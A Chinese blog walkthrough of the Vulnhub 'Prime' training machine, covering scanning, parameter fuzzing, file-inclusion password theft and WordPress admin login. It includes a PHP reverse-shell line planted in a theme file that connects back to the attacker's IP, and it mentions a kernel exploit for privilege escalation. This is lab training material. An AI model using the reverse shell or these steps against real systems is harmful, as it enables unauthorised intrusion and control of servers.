【学渗透靶机——prime】

已于 2023-06-21 13:57:52 修改
阅读量237 收藏
点赞数
分类专栏: 靶机学习 文章标签: 安全
于 2023-05-13 16:30:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jieli0901227/article/details/130654402
版权

渗透靶机——prime

环境

攻击机:kali
靶机:prime

信息收集:

主机信息收集

主机ip收集:

nmap -sn  192.168.241.0/24

主机端口信息收集:

root@kali:~# nmap --min-rate 10000 -p- 192.168.241.151

在这里插入图片描述

主机开放端口服务版本

root@kali:~# nmap -sT -sV -sC -p22,80  192.168.241.151

在这里插入图片描述

nmap简单漏洞探测信息收集

root@kali:~# nmap --script=vuln -p22,80  192.168.241.151

在这里插入图片描述
主机信息总结
这台靶机开放端口 22 80 端口 使用nmap 扫描只有枚举的信息, 22 端口也没有账密信息 ,所以重点放在80端口上

web信息收集

访问80浏览器显示如下:

在这里插入图片描述
查看源代码
在这里插入图片描述
也没发现什么有用的信息

查看namp 漏洞枚举的web

浏览器访问页面如下所示,发现是wordpress CMS, wordprees 后台登录页面
在这里插入图片描述
在这里插入图片描述
我们使用wpscan 扫描 进行后台账号枚举
在这里插入图片描述
发现这个有个账号 victor ,尝试目录爆破失败

目录扫描

gobuster dir -u http://192.168.241.151 -x txt,php,zip,bak -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

在这里插入图片描述

访问查看发现
在这里插入图片描述
翻译过来大概是

**1)对于php文件做更多的fuzz,找到正确的参数
parameter
2)可以使用fuzz工具,比如git的:Fuzz_For_
Web
3)如果还是卡在这一步,去学学OSCP(
Offensive Security Certified Professional)——
以Kali Linux 实际操作为主要内容的考试
4)如果找到location.txt的位置,就知道下一步
怎么做(先记住它,后面会用到)

wfuzz 模糊测试

通过模糊测试index.php 的参数,结果如下图:
在这里插入图片描述
得到http://192.168.184.160/index.php?file=filename(可能是文件包含 下载漏洞)

尝试文件包含漏洞
在这里插入图片描述
页面提示我挖错文件了,,那就尝试读取location.txt.,如下图
在这里插入图片描述

文件包含利用

提示使用secrettier360作为参数在每一个php 页面,有参数没有值,那我们就在index.php 和image.php 上测试文件包含漏洞

通过测试只有image.php存在文件包含漏洞,并且在saket 的家目录有个passwod,txt
在这里插入图片描述
利用文件包含读取password.txt
在这里插入图片描述
获得一个密码
开放了22端口:尝试ssh 登录,失败
在这里插入图片描述
尝试wordpress 的后台登录,通过victor 成功登录
在这里插入图片描述
接下来直接拿webshell,打开我们最喜欢的主题编辑器,翻了半天,只有secret.php 存在写权限,写入反弹shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.241.140/443 0>&1'");  ?>

在这里插入图片描述
保存后,访问这个secret.php 这个页面就可以触发,连接到攻击机,
那个这个页面的路径查找方法:

1、互联网搜索
2、wpscan 扫描
3、目录爆破
4、重新部署wordpress

这里我使用wpscan
在这里插入图片描述
靶机设置监听
在这里插入图片描述

获取系统初始shell

1、查看身份

whoami

在这里插入图片描述

2、查看系统可执行超级权限

sudo -l

在这里插入图片描述
查看enc 文件 无读权限
在这里插入图片描述

3、查看计划任务
在这里插入图片描述
有一个执行脚本,但是没有权限,不做考虑
4、查看系统版本
在这里插入图片描述

提权

使用searchsploit 搜索版本内核是否有漏洞
在这里插入图片描述
下载45010.c 上传靶机内核提权
在这里插入图片描述

懒惰的老鼠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulhub渗透测试靶机习1
08-08
渗透测试靶机习0x01 lampiao靶机准备环境靶机下载地址https://download.vulnhub.com/lampiao/Lampiao.zip
web渗透测试靶机(新手)
05-07
web渗透测试靶机(新手)
红队打靶:Prime1详细打靶思路之模糊测试+内核提权(vulnhub)
Bossfrank的博客
06-11 1434
本篇博客详述了vulnhub靶机prime1的打靶思路过程,并非简单复现writeup。打靶过程涉及到关于模糊测试及wfuzz工具的使用、文件包含漏洞利用、wordpress CMS、内核漏洞提权。有关OpenSSH渗透的方法将在下一篇博客中详述。
Vulnhub | 实战靶场渗透测试 - PRIME: 1
尼泊罗河伯的博客
06-01 1609
这台机器是为那些试图准备 OSCP 或 OSCP 考试的人设计的。这是素数系列的第一级。在每个阶段都会提供一些帮助。机器很长,因为 OSCP 和黑客的机器是设计的。因此,您有一个获取根标志和用户标志的目标。如果卡在某个点上,则会在枚举级别上提供一些帮助。
「红队笔记」靶机精讲:Prime1 - 信息收集和分析能力的试炼
最新发布
m0_73612768的博客
12-12 1110
本文是作者在观看 B 站《红队笔记》后做的一些笔记及相关知识的补充。渗透特别推荐大家去看。如有侵权,请联系作者,作者看到后会第一时间删除。
Vulnhub靶场Prime_Series_Level-1渗透
m0_65712192的博客
02-12 1589
Vulnhub靶场Prime_Series_Level-1渗透
prime1靶场渗透
weixin_73562787的博客
07-18 237
靶场练习,详细全过程,prime1.0靶场
OWASP靶机安全习、测试
05-24
在信息安全中OWASP TOP 10 是渗透测试人员都会涉及到的一个项目,意思是10项最严重的Web 应用程序安全风险列表,该列表总结并更新Web应用程序中最可能、最常见、最危险的十大漏洞。这里包括: A1—注入 A2—失效的...
渗透测试入门——渗透测试笔记
01-27
CMS同样能在网上找到许多漏洞,常用作渗透测试的练习靶机。根据提示,第1题要求找到咨询平台的管理员账号密码;第2题需要登录服务器后台,并插入木马,再用中国菜刀连接,继而找到在管理员桌面上的 flag文件;第3题...
2020最新渗透测试靶机和工具及教程
05-30
搜集的渗透测试的靶场,有Bwapp综合靶场练习 webug综合靶场练习 DVWA综合靶场练习 pikachu靶场练习 uploads文件练习 SQlilabs注入练习 ZVulDirll综合靶场,全部封装在虚拟机中,渗透工具封装在另一虚拟机中。
一次prime1靶场红队渗透实战,从主机发现到Linux内核漏洞提权
QQQPPPAAALLLZZZ的博客
07-03 865
使用了namp端口和存活主机扫描 ,dir目录扫描, FUZZ参数扫描 , MSF反弹连接,LINUX内核提权。完成了从访问页面->获取后台管理员权限 -> 获取操作系统权限 -> 获取root权限的全过程。
【vulnhub靶场】PRIME:1打靶过程记录
didiplus
07-17 2808
最近发现一个很有趣的靶场集合,里面涵盖了一些基本的漏洞,我们通过漏洞复现。了解一些网络安全的一些基本操作。
vulnhub靶机练习之prime1
weixin_53665747的博客
06-04 131
这次靶机相对前两次有一点点绕,不过总体还是简单的难度。前几次的算比较容易,这个算容易。思路就是先利用目录扫描得到目录路径信息,在通过文件扫描得到提示文件,fuzz出参数进行文件包含读取web密码,进入后台执行反弹shell,利用系统漏洞提权。
【技术分享】Prime靶场
Innocence_0的博客
07-23 104
本篇文章记录了靶场prime的打靶过程,包括如何渗透、getshell和提权等环节。小星认为,此次打靶过程极具挑战性和趣味性,期待各位读者与小星交流探讨。
Vulnhub: Prime (2021): 2靶机
qq_43884092的博客
07-22 92
wordpress插件gracemedia-media-player文件包含,samba上传公钥拿shell,CVE-2021-4034、lxd提权
Vulnhub靶机PRIME_ 1
LainWith的博客
12-10 605
Prime(此系列共1台)发布日期:2019年9月1日难度:初-中运行环境:VMware Workstation目标:取得 root 权限 + Flag主机发现端口扫描+漏洞扫描目录爆破文件扩展名爆破强制访问文件包含漏洞WordPress利用内核提权。
AI WEB 1.0靶场渗透思路
weixin_69010236的博客
07-25 414
12.跑出了两个表的名称,但是表内没有我们想要的数据,因为我们目录扫描的时候,没有扫描出后台的登录页面,所以说获取到账号密码也是没有用的,我们可以想到之前我们获取到了一个phpinfo的页面,存在路径,我们就去尝试获取shell。3.我们可以看到扫出两个目录,我们去访问一下,第一个/index.html什么都没有,我们访问第二个/robots.txt,可以发现/robots.txt下面显示还有目录,我们接着去访问。7.我们发现是一个phpinfo的网页,但是我们可以获取到有用的信息,比如IP地址和路径。
实战项目之AIWEB2靶场渗透
胖虎的博客
11-05 1300
AIweb2靶场渗透测试
Web渗透漏洞靶场收集
m0_61869253的博客
03-23 615
如果你想搞懂一个漏洞,比较好的方法是:你可以自己先用代码编写出这个漏洞,然后再利用它,最后再修复它”。—-摘自pikachu漏洞靶场的一句话。初的时候玩靶场会很有意思,可以练习各种思路和技巧,用来检测扫描器的效果也是很好的选择。今天,我们来数数那些入门Web安全必不可错过的靶场。AWVS的测试站点,用于扫描效果验证,提供了多场景的公网靶场,也常作为漏洞利用演示的目标。Web安全入门必刷的靶场,包含了最常见的web漏洞,界面简单易用,通过设置不同的难度,可更好地理解漏洞的原理及对应的代码防护。
vulnhub靶机——raven: 2
09-03
- *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值